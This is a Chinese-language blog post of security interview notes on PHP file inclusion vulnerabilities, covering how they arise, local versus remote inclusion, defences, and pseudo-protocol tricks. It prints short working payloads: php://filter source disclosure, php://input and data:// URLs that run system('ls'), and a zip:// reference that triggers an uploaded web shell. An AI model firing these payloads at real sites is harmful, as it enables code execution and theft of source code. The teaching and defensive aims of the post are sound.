文件包含漏洞原理/利用方式/应对方案

已于 2024-06-23 17:27:25 修改
阅读量1.6w 收藏 4
点赞数 3
分类专栏: 网络安全面试题汇总 文章标签: 网络 web安全 安全 网络安全
于 2021-07-16 11:32:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118788658
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

原理

用户利用文件包含函数上传可执行脚本文件,造成信息泄露或任意命令执行

触发点/检测

文件包含漏洞的检测需要配合代码审计,重点在文件包含的函数

  • include()
  • require()
  • include_once()
  • require_once()
  • f_open()
  • f_read()

利用方式

文件包含漏洞可分为 本地文件包含(LFI) 远程文件包含 两种

本地文件包含可以遍历目录,造成信息泄露

远程文件包含可以执行任意命令,获取WebShell,需要PHP开启url包含功能( allow_url_include ),PHP5.2以前默认是开启 , 5.2以后就默认关闭了

防御

针对远程文件包含可关闭url包含功能( php.ini文件中 allow_url_include=off )

针对本地文件包含可以设置白名单,过滤危险字符(比如.和/)

伪协议

文件包含漏洞可以配合伪协议使用

  • php协议读取文件源码或者任意代码执行
  • data协议任意代码执行
  • zip协议配合文件上传开启后门

php://filter 读取文件源码

?url=php://filter/read=convert.base64-encode/resource=phpinfo.php

php://input 任意代码执行

?url=php://input				-- GET请求参数中使用php://input协议
<?php system('ls'); ?>			-- post请求体中的内容会被当做文件内容执行

data://text/plain 任意代码执行

?url=data://text/plain,<?php system('ls') ?>

zip:// 配合文件上传开启后门

?url=zip://shell.jpg

士别三日wyx
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4013
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
php passthru,php的system()函数&exec()函数&passthru()函数的用法介绍
weixin_29164843的博客
03-10 987
本篇文章给大家带来的内容是关于PHP的system()函数&exec()函数&passthru()函数的用法介绍 ,有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。函数具体用法对于我这个菜鸟连php的system的用法都不知道,今天做个简单记录。system() 输出并返回最后一行shell结果。exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到...
文件包含漏洞全面详解
最新发布
qq_53058639的博客
05-20 758
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
Fighting_hawk的博客
03-11 5099
1. 关于图片马的几种执行方式总结: (1)利用中间件解析漏洞,不同中间件不同版本的利用方式往往不同。 (2)利用.htaccess修改Apache局部配置。 (3) 利用文件包含执行漏洞。 2. 了解PHP魔术引号的作用。 3. 掌握文件包含漏洞空字符绕过的方法。 4. 掌握文件包含漏洞的六种利用方式。...
五种利用本地包含漏洞方式
weixin_33694172的博客
09-25 1001
本文讲的是五种利用本地包含漏洞方式,本地文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用内部定义的函数。 本...
360漏洞修复工具 遺夨单文件版
08-13
它能够全面扫描用户计算机中的操作系统以及安装的各类应用程序,找出可能存在的安全漏洞,并提供及时的修补方案。这款“遺夨单文件版”意味着它是独立的、单一的可执行文件,无需安装即可运行,方便快捷。 在功能...
cpp-Mandibule是一个允许将ELF文件注入远程进程的程序
08-16
- **安全研究**:在渗透测试和漏洞利用中,将恶意代码注入到目标进程中是一种常见的手法,Mandibule为此提供了一种工具化的解决方案。 - **逆向工程**:逆向工程师可能会用Mandibule来动态分析目标程序的行为,甚至...
CVE-2018-4193:CVE-2018-4193的漏洞利用
03-17
**CVE-2018-4193详解:...了解这个漏洞原理利用方式,有助于我们更好地理解并应对类似的威胁。通过深入研究提供的压缩包文件"CVE-2018-4193-master",我们可以更详细地学习这个漏洞的细节和可能的解决方案
企业DLP数据安全保护解决方案.pdf
10-13
DLP解决方案的实施旨在减少由于疏忽、恶意行为或系统漏洞导致的数据泄漏事件,保护企业的核心资产。 1. **内部威胁**:内部员工或合作伙伴通常是数据泄漏的主要源头。员工可能因无意的行为,如误发邮件、丢失设备或...
CaptfEncoder-win-x64-2.0.1.zip
07-05
在CaptfEncoder-win-x64-2.0.1.zip中,这个文件可能详细解释了如何安装和运行CaptfEncoder,以及如何利用其特性进行编码和解密操作。 config文件夹可能包含了应用程序的配置文件,用户可以通过修改这些文件来定制...
文件包含漏洞相关协议详解
永远是少年
12-13 2423
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 一、文件包含常用协议 1、file协议 2、php相关协议 3、zip协议 4、data协议 5、其他协议 二、各协议利用条件
文件包含漏洞原理利用
m0_52556798的博客
03-28 4216
最近的总结都比较简单,但不是在水,只是在我学习过程中总结的觉得真的有用的知识,还有就是有些代码发不出来我也没办法,所以就有所调整。 文件包含原理是啥? 文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时, 就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件, 此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 讲讲
文件包含漏洞利用
qq_56327824的博客
04-27 3088
文件包含漏洞给是“代码注入”的一种,“代码注入”这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器执行 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节 省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接
php system()
热门推荐
刘阳龙Herman的专栏
09-14 1万+
<br />php函数system详解:<br />执行外部程序并显示输出资料。 <br />system语法: string system(string command, int [return_var]); <br />system返回值: 字符串 <br />函数种类: 操作系统与环境 <br /> <br />system内容说明 <br />本函数就像是 C 语中的函数 system(),用来执行指令,并输出结果。若是 return_var 参数存在,则执行 command 之后的状态会填入 re
PHP的system函数
hello PHP的博客
12-20 9946
PHP代码如下: <?php $v = system('netstat -tnlp',$shell_return); var_dump($shell_return); var_dump($v); 执行结果: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address ...
PHP的系统程序执行函数(部分)system,passthru,exec
疯狂草的博客
08-02 666
exec — 执行一个外部程序 string exec ( string $command [, array &amp;$output [, int &amp;$return_var ]] ) 范例 &lt;?php         echo exec("ls",$output);         echo "&lt;/br&gt;";         print_r($file); ?&...
php system漏洞,命令执行漏洞
weixin_34060773的博客
03-19 1082
命令执行应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞利用条件应用调用执行系统命令的函数将用户输入作为系统命令的参数拼接到了命令行中没有对用户输入进行过滤或过滤不严漏洞分类代码层过滤...
php文件包含
m0_64361111的博客
02-28 1384
概念 把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。这一调用文件的过程被称为包含。 原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。泄露甚
文件上传漏洞原理利用
05-18
文件上传漏洞是指攻击者通过应用程序的文件上传功能,上传恶意文件或脚本文件到服务器上并执行,从而实现攻击的一种漏洞。 攻击者可以通过文件上传漏洞,上传包含恶意代码的文件,如WebShell、木马程序等,从而获取服务器权限或者窃取敏感信息。攻击者还可以通过上传具有特殊命名的文件,绕过应用程序的安全机制,如文件类型检查、文件大小检查等,进而执行任意代码。 利用文件上传漏洞的步骤如下: 1. 打开应用程序的文件上传功能,上传恶意文件或脚本文件; 2. 利用上传的文件执行恶意代码,如WebShell、木马程序等; 3. 获取服务器权限或者窃取敏感信息。 为了防止文件上传漏洞,可以采取以下措施: 1. 对上传文件的类型、大小、内容等进行严格限制; 2. 在服务器上对上传的文件进行病毒扫描和安全检查; 3. 将上传的文件存放在非Web根目录下,防止直接访问; 4. 禁用不必要的文件上传功能; 5. 对上传文件的访问权限进行限制,只有可信的用户才能上传文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值